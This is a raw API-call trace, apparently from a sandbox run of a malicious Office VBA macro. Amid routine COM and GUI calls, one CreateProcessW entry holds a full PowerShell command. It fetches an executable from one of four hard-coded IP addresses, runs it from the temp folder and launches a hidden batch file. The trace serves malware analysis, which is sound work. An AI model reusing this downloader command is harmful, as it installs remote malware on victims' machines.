[0042.247] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.247] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e8e8, ppTypeAttr=0x180e60, pDummy=0x0 | out: ppTypeAttr=0x180e60, pDummy=0x0) returned 0x0 [0042.247] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e8e8) returned 0x0 [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cc0790, dwSize=0x4c) returned 1 [0042.247] IMalloc:Free (This=0x7feffc15380, pv=0x6cc0790) [0042.247] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceeeb8, ppTypeAttr=0x1810a0, pDummy=0x0 | out: ppTypeAttr=0x1810a0, pDummy=0x0) returned 0x0 [0042.247] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceeeb8) returned 0x0 [0042.247] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x1814d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x24c2f50*=0x5380) returned 0x0 [0042.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee460d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0042.247] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1814d0, pbstrName=0x0, pwOrdinal=0x1814f0 | out: pBstrDllName=0x1814d0*=0x0, pbstrName=0x0, pwOrdinal=0x1814f0*=0x1760) returned 0x0 [0042.247] ITypeInfo:RemoteGetDllEntry (in: This=0x6bb4b88, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1814d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1814d0, pwOrdinal=0x500000000) returned 0x0 [0042.247] IMalloc:Realloc (This=0x7feffc15380, pv=0x6703120, cb=0x172) returned 0x6c97eb0 [0042.247] IMalloc:Free (This=0x7feffc15380, pv=0x6ccfc10) [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7bf68, dwSize=0x8) returned 1 [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a7c038, dwSize=0x8) returned 1 [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab018, dwSize=0x8) returned 1 [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab0e0, dwSize=0x8) returned 1 [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab270, dwSize=0x8) returned 1 [0042.247] GetCurrentProcess () returned 0xffffffffffffffff [0042.247] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab330, dwSize=0x8) returned 1 [0042.248] GetCurrentProcess () returned 0xffffffffffffffff [0042.248] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab368, dwSize=0x8) returned 1 [0042.248] GetCurrentProcess () returned 0xffffffffffffffff [0042.248] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab4a8, dwSize=0x8) returned 1 [0042.248] GetCurrentProcess () returned 0xffffffffffffffff [0042.248] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cab578, dwSize=0x8) returned 1 [0042.248] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.248] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0042.248] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0042.248] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e7) returned 1 [0042.248] SetErrorMode (uMode=0x8001) returned 0x8001 [0042.249] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x258) returned 0x7fee4334ee0 [0042.249] GetCurrentProcess () returned 0xffffffffffffffff [0042.249] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad244, dwSize=0x43) returned 1 [0042.249] RtlLookupFunctionEntry (in: ControlPc=0x6cad244, ImageBase=0x181638, HistoryTable=0x181640 | out: ImageBase=0x181638, HistoryTable=0x181640) returned 0x0 [0042.249] VirtualProtect (in: lpAddress=0x6cad244, dwSize=0x44, flNewProtect=0x40, lpflOldProtect=0x18173c | out: lpflOldProtect=0x18173c*=0x40) returned 1 [0042.249] RtlAddFunctionTable (FunctionTable=0x6cad294, EntryCount=0x1, BaseAddress=0x6cad200, TargetGp=0x18173c) returned 1 [0042.249] IUnknown:AddRef (This=0x6a6e8e8) returned 0xa [0042.249] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b68 | out: ppvObject=0x182b68*=0x0) returned 0x80004002 [0042.249] IUnknown:QueryInterface (in: This=0x6a6e8e8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b60 | out: ppvObject=0x182b60*=0x0) returned 0x80004002 [0042.249] IUnknown:Release (This=0x6a6e8e8) returned 0x9 [0042.249] IUnknown:AddRef (This=0x6ceee08) returned 0x5 [0042.249] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b68 | out: ppvObject=0x182b68*=0x0) returned 0x80004002 [0042.249] IUnknown:QueryInterface (in: This=0x6ceee08, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b60 | out: ppvObject=0x182b60*=0x0) returned 0x80004002 [0042.249] IUnknown:Release (This=0x6ceee08) returned 0x4 [0042.249] IUnknown:AddRef (This=0x6ceeeb8) returned 0x6 [0042.249] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b68 | out: ppvObject=0x182b68*=0x0) returned 0x80004002 [0042.249] IUnknown:QueryInterface (in: This=0x6ceeeb8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b60 | out: ppvObject=0x182b60*=0x0) returned 0x80004002 [0042.249] IUnknown:Release (This=0x6ceeeb8) returned 0x5 [0042.249] IUnknown:AddRef (This=0x6bb49d0) returned 0x4 [0042.249] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b68 | out: ppvObject=0x182b68*=0x0) returned 0x80004002 [0042.249] IUnknown:QueryInterface (in: This=0x6bb49d0, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b60 | out: ppvObject=0x182b60*=0x0) returned 0x80004002 [0042.249] IUnknown:Release (This=0x6bb49d0) returned 0x3 [0042.249] IUnknown:AddRef (This=0x6bb4b88) returned 0x3 [0042.249] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b68 | out: ppvObject=0x182b68*=0x0) returned 0x80004002 [0042.249] IUnknown:QueryInterface (in: This=0x6bb4b88, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x182b60 | out: ppvObject=0x182b60*=0x0) returned 0x80004002 [0042.249] IUnknown:Release (This=0x6bb4b88) returned 0x2 [0042.249] VarAdd (in: pvarLeft=0x6b7ec00, pvarRight=0x6b7ec18, pvarResult=0x6b7ebe8 | out: pvarResult=0x6b7ebe8) returned 0x0 [0042.250] VarSub (in: pvarLeft=0x6b7ebd0, pvarRight=0x6b7ec00, pvarResult=0x6b7ec18 | out: pvarResult=0x6b7ec18) returned 0x0 [0042.250] VarCmp (pvarLeft=0x6b7ebd0, pvarRight=0x6b7ec00, lcid=0x0, dwFlags=0x30001) returned 0x1 [0042.250] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x182e30*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x182e10 | out: lpCommandLine="cmd /c powershell \"'powershell \"\"function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,''%tmp%\\tmp6149.exe'');}catch{$tig1=0;}return $tig1;}$mok1=@(''193.187.172.11'',''46.173.218.240'',''193.187.172.42'',''46.173.218.83'');foreach ($liu in $mok1){if(fmoke(''http://''+$liu+''/uncle_sam.php'') -eq 1){break;} } start-process ''%tmp%\\tmp6149.exe'';'\"\"| out-file -encoding ascii -filepath %tmp%\\tmp1971.bat; start-process '%tmp%\\tmp1971.bat' -windowstyle hidden\"", lpProcessInformation=0x182e10*(hProcess=0xa4c, hThread=0xa44, dwProcessId=0x994, dwThreadId=0x998)) returned 1 [0042.409] GetLastError () returned 0x0 [0042.409] WaitForInputIdle (hProcess=0xa4c, dwMilliseconds=0x2710) returned 0xffffffff [0042.409] CloseHandle (hObject=0xa44) returned 1 [0042.409] CloseHandle (hObject=0xa4c) returned 1 [0042.409] SysStringByteLen (bstr="潎浲污") returned 0x6 [0042.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0042.409] SysStringByteLen (bstr="潎浲污") returned 0x6 [0042.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0042.410] strcpy_s (in: _Dst=0x1860e0, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0042.410] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0042.410] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0042.410] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0042.412] PeekMessageA (in: lpMsg=0x186540, hWnd=0x0, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x0 | out: lpMsg=0x186540) returned 0 [0042.412] PostMessageA (hWnd=0x101e8, Msg=0x1045, wParam=0x0, lParam=0x0) returned 1 [0042.412] IMalloc:Free (This=0x7feffc15380, pv=0x6b85310) [0042.440] IsWindowVisible (hWnd=0x10202) returned 0 [0042.570] GetCapture () returned 0x0 [0042.570] GetCursorPos (in: lpPoint=0x18f5c0 | out: lpPoint=0x18f5c0*(x=1018, y=358)) returned 1 [0042.570] WindowFromPoint (Point=0x166000003fa) returned 0x50024 [0042.571] GetWindowThreadProcessId (in: hWnd=0x50024, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8c0 [0042.571] SendMessageA (hWnd=0x50024, Msg=0x84, wParam=0x0, lParam=0x16603fa) returned 0x1 [0042.571] SendMessageA (hWnd=0x50024, Msg=0x20, wParam=0x50024, lParam=0x2000001) returned 0x0 [0042.571] FillRect (hDC=0x180108c2, lprc=0x18ef80, hbr=0x61008b7) returned 1 [0042.572] GetObjectA (in: h=0x10508c8, c=32, pv=0x18ee80 | out: pv=0x18ee80) returned 32 [0042.572] GetDC (hWnd=0x0) returned 0x50108c4 [0042.572] GetDeviceCaps (hdc=0x50108c4, index=90) returned 96 [0042.572] DeleteDC (hdc=0x50108c4) returned 1 [0042.572] GetDC (hWnd=0x0) returned 0x50108c4 [0042.572] GetDeviceCaps (hdc=0x50108c4, index=88) returned 96 [0042.572] DeleteDC (hdc=0x50108c4) returned 1 [0042.572] GetObjectA (in: h=0x10508c8, c=32, pv=0x18edf0 | out: pv=0x18edf0) returned 32 [0042.572] ImageList_AddMasked (himl=0x32f4a0, hbmImage=0x10508c8, crMask=0xff00ff) returned 22 [0042.572] _msize (_Block=0x27480f0) returned 0x28 [0042.572] ImageList_Draw (himl=0x32f4a0, i=22, hdcDst=0x180108c2, x=0, y=0, fStyle=0x0) returned 1 [0042.572] StretchBlt (hdcDest=0x1801025d, xDest=13, yDest=5, wDest=16, hDest=16, hdcSrc=0x180108c2, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0042.572] SelectObject (hdc=0x180108c2, h=0x185000f) returned 0x30508c7 [0042.572] DeleteObject (ho=0x30508c7) returned 1 [0042.572] DeleteDC (hdc=0x180108c2) returned 1 [0042.572] SelectObject (hdc=0x370101b3, h=0x185000f) returned 0x3a0507a7 [0042.572] DeleteObject (ho=0x3a0507a7) returned 1 [0042.576] CreateCompatibleBitmap (hdc=0x1801025d, cx=16, cy=16) returned 0x3d0507a7 [0042.576] SelectObject (hdc=0x370101b3, h=0x3d0507a7) returned 0x185000f [0042.576] GetDC (hWnd=0x0) returned 0x50108c4 [0042.576] CreateCompatibleDC (hdc=0x50108c4) returned 0x50108c9 [0042.576] GetDC (hWnd=0x0) returned 0x350108b5 [0042.576] GetDeviceCaps (hdc=0x350108b5, index=88) returned 96 [0042.576] DeleteDC (hdc=0x350108b5) returned 1 [0042.576] GetDC (hWnd=0x0) returned 0x350108b5 [0042.576] GetDeviceCaps (hdc=0x350108b5, index=90) returned 96 [0042.576] DeleteDC (hdc=0x350108b5) returned 1 [0042.576] CreateCompatibleBitmap (hdc=0x50108c4, cx=16, cy=16) returned 0x40508ca [0042.576] SelectObject (hdc=0x50108c9, h=0x40508ca) returned 0x185000f [0042.576] ReleaseDC (hWnd=0x0, hDC=0x50108c4) returned 1 [0042.576] FillRect (hDC=0x50108c9, lprc=0x18ef80, hbr=0x61008b7) returned 1 [0042.576] ImageList_Draw (himl=0x32f4a0, i=22, hdcDst=0x50108c9, x=0, y=0, fStyle=0x0) returned 1 [0042.576] StretchBlt (hdcDest=0x1801025d, xDest=13, yDest=5, wDest=16, hDest=16, hdcSrc=0x50108c9, xSrc=0, ySrc=0, wSrc=16, hSrc=16, rop=0xcc0020) returned 1 [0042.576] SelectObject (hdc=0x50108c9, h=0x185000f) returned 0x40508ca [0042.576] DeleteObject (ho=0x40508ca) returned 1 [0042.576] DeleteDC (hdc=0x50108c9) returned 1 [0042.577] SelectObject (hdc=0x370101b3, h=0x185000f) returned 0x3d0507a7 [0042.577] DeleteObject (ho=0x3d0507a7) returned 1 [0042.585] GetSysColor (nIndex=18) returned 0x0 [0042.585] SetTextColor (hdc=0x1801025d, color=0x0) returned 0x0 [0042.585] GetSysColor (nIndex=15) returned 0xf0f0f0 [0042.585] SetBkColor (hdc=0x1801025d, color=0xf0f0f0) returned 0xffffff [0042.585] lstrlenA (lpString="") returned 0 [0042.585] GetTextExtentPoint32A (in: hdc=0x1801025d, lpString="", c=0, psizl=0x18f2f0 | out: psizl=0x18f2f0) returned 1 [0042.585] MulDiv (nNumber=17, nNumerator=1, nDenominator=2) returned 9 [0042.585] lstrlenA (lpString="") returned 0 [0042.585] ExtTextOutA (hdc=0x1801025d, x=475, y=14, options=0x0, lprect=0x18f300, lpString="", c=0x0, lpDx=0x0) returned 1 [0053.031] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0081.306] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0218.476] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a68e80) returned 0x0 [0218.476] GetLastError () returned 0x0 [0218.478] GetCurrentThreadId () returned 0x8c0 [0218.479] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e1f30*(Data1=0x113, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894d0 | out: ppvObject=0x1894d0*=0x3c03450) returned 0x0 [0218.480] UserForm:IOleInPlaceObject:InPlaceDeactivate (This=0x3c03450) returned 0x0 [0218.480] IsWindow (hWnd=0x20240) returned 1 [0218.480] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x210, wParam=0x2, lParam=0x20240) returned 0x0 [0218.481] UserForm:IUnknown:Release (This=0x3c03450) [0218.481] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e1f20*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894a8 | out: ppvObject=0x1894a8*=0x6bc2d20) returned 0x0 [0218.481] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e2620*(Data1=0x10d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189510 | out: ppvObject=0x189510*=0x3c033d8) returned 0x0 [0218.481] UserForm:IUnknown:QueryInterface (in: This=0x3c033c0, riid=0x7fee45e1f20*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189500 | out: ppvObject=0x189500*=0x6bc2d20) returned 0x0 [0218.482] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x1081, wParam=0x0, lParam=0x0) returned 0x0 [0218.482] DestroyWindow (hWnd=0x2023e) returned 1 [0218.482] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0218.482] GetPropA (hWnd=0x2023e, lpString="VBAutomation") returned 0x0 [0218.482] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0218.482] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0218.483] IMalloc:Alloc (This=0x7feffc15380, cb=0x3b8) returned 0x6a09e00 [0218.489] IMalloc:Alloc (This=0x7feffc15380, cb=0x370) returned 0xdf3cb70 [0218.489] IMalloc:GetSize (This=0x7feffc15380, pv=0xdf3cb70) returned 0x370 [0218.490] IMalloc:Free (This=0x7feffc15380, pv=0x6c2d8b0) [0218.491] IMalloc:Free (This=0x7feffc15380, pv=0x6c10980) [0218.491] IUnknown:Release (This=0x6990960) returned 0xc [0218.491] IUnknown:Release (This=0x6992850) returned 0x10 [0218.491] IUnknown:Release (This=0x6992df0) returned 0xb [0218.491] IUnknown:Release (This=0x6992580) returned 0x5 [0218.491] IUnknown:Release (This=0x6993ed0) returned 0x5 [0218.491] IUnknown:Release (This=0x6c93b80) returned 0x3 [0218.491] IUnknown:Release (This=0x6c935e0) returned 0x1e [0218.491] GetCurrentProcess () returned 0xffffffffffffffff [0218.491] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacdac, dwSize=0x4c) returned 1 [0218.491] RtlLookupFunctionEntry (in: ControlPc=0x6cacdac, ImageBase=0x1897b8, HistoryTable=0x1897c0 | out: ImageBase=0x1897b8, HistoryTable=0x1897c0) returned 0x6cace08 [0218.491] GetCurrentProcess () returned 0xffffffffffffffff [0218.491] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cace64, dwSize=0x4c) returned 1 [0218.491] RtlLookupFunctionEntry (in: ControlPc=0x6cace64, ImageBase=0x1897b8, HistoryTable=0x1897c0 | out: ImageBase=0x1897b8, HistoryTable=0x1897c0) returned 0x6cacec0 [0218.491] GetCurrentProcess () returned 0xffffffffffffffff [0218.491] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacdac, dwSize=0x4c) returned 1 [0218.491] RtlLookupFunctionEntry (in: ControlPc=0x6cacdac, ImageBase=0x1897b8, HistoryTable=0x1897c0 | out: ImageBase=0x1897b8, HistoryTable=0x1897c0) returned 0x6cace08 [0218.491] GetCurrentProcess () returned 0xffffffffffffffff [0218.491] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cace64, dwSize=0x4c) returned 1 [0218.491] RtlLookupFunctionEntry (in: ControlPc=0x6cace64, ImageBase=0x1897b8, HistoryTable=0x1897c0 | out: ImageBase=0x1897b8, HistoryTable=0x1897c0) returned 0x6cacec0 [0218.491] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.492] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.492] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.492] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a0000035c) returned 1 [0218.492] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.493] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x269) returned 0x7fee439d48c [0218.493] GetCurrentProcess () returned 0xffffffffffffffff [0218.493] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cacff4, dwSize=0x4b) returned 1 [0218.493] RtlLookupFunctionEntry (in: ControlPc=0x6cacff4, ImageBase=0x189758, HistoryTable=0x189760 | out: ImageBase=0x189758, HistoryTable=0x189760) returned 0x6cad04c [0218.493] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.493] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.493] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.494] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a0000035d) returned 1 [0218.494] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.494] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x26b) returned 0x7fee439d5a8 [0218.494] GetCurrentProcess () returned 0xffffffffffffffff [0218.494] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad0c4, dwSize=0x4b) returned 1 [0218.494] RtlLookupFunctionEntry (in: ControlPc=0x6cad0c4, ImageBase=0x189758, HistoryTable=0x189760 | out: ImageBase=0x189758, HistoryTable=0x189760) returned 0x6cad11c [0218.494] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.494] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.494] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.495] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a0000035e) returned 1 [0218.495] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.495] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x258) returned 0x7fee4334ee0 [0218.495] GetCurrentProcess () returned 0xffffffffffffffff [0218.495] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6cad244, dwSize=0x43) returned 1 [0218.495] RtlLookupFunctionEntry (in: ControlPc=0x6cad244, ImageBase=0x189758, HistoryTable=0x189760 | out: ImageBase=0x189758, HistoryTable=0x189760) returned 0x6cad294 [0218.495] GetCurrentThreadId () returned 0x8c0 [0218.495] GetCurrentThreadId () returned 0x8c0 [0218.495] GetCurrentThreadId () returned 0x8c0 [0218.495] GetCurrentThreadId () returned 0x8c0 [0218.498] GetSysColor (nIndex=18) returned 0x0 [0218.498] SetTextColor (hdc=0x70109a2, color=0x0) returned 0x0 [0218.498] GetSysColor (nIndex=15) returned 0xf0f0f0 [0218.498] SetBkColor (hdc=0x70109a2, color=0xf0f0f0) returned 0xffffff [0218.498] lstrlenA (lpString="") returned 0 [0218.498] GetTextExtentPoint32A (in: hdc=0x70109a2, lpString="", c=0, psizl=0x189e50 | out: psizl=0x189e50) returned 1 [0218.498] MulDiv (nNumber=17, nNumerator=1, nDenominator=2) returned 9 [0218.498] lstrlenA (lpString="") returned 0 [0218.498] ExtTextOutA (hdc=0x70109a2, x=475, y=14, options=0x0, lprect=0x189e60, lpString="", c=0x0, lpDx=0x0) returned 1 [0218.501] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0218.501] SysStringByteLen (bstr="潎浲污") returned 0x6 [0218.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d497a8, cbMultiByte=7, lpWideCharStr=0x6bc4228, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0218.501] strcpy_s (in: _Dst=0x189d20, _DstSize=0x410, _Src="Microsoft Visual Basic for Applications" | out: _Dst="Microsoft Visual Basic for Applications") returned 0x0 [0218.501] strcat_s (in: _Destination="Microsoft Visual Basic for Applications", _SizeInBytes=0x410, _Source=" - " | out: _Destination="Microsoft Visual Basic for Applications - ") returned 0x0 [0218.501] strcat_s (in: _Destination="Microsoft Visual Basic for Applications - ", _SizeInBytes=0x410, _Source="Normal" | out: _Destination="Microsoft Visual Basic for Applications - Normal") returned 0x0 [0218.501] SetWindowTextA (hWnd=0x10202, lpString="Microsoft Visual Basic for Applications - Normal") returned 1 [0218.502] SendMessageA (hWnd=0x1020a, Msg=0x1102, wParam=0x1, lParam=0x6a68e80) returned 0x0 [0218.502] GetLastError () returned 0x0 [0218.502] GetCurrentThreadId () returned 0x8c0 [0218.502] CExposedDocFile::Release () returned 0x4 [0218.502] CExposedDocFile::Release () returned 0x3 [0218.502] CExposedDocFile::Release () returned 0x2 [0218.502] CExposedDocFile::Release () returned 0x1 [0218.503] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0218.503] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fee4230000 [0218.503] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a0000035f) returned 1 [0218.503] SetErrorMode (uMode=0x8001) returned 0x8001 [0218.504] GetProcAddress (hModule=0x7fee4230000, lpProcName=0x269) returned 0x7fee439d48c [0218.504] GetCurrentProcess () returned 0xffffffffffffffff [0218.504] FlushInstructionCache (hProcess=0xffffffffffffffff, 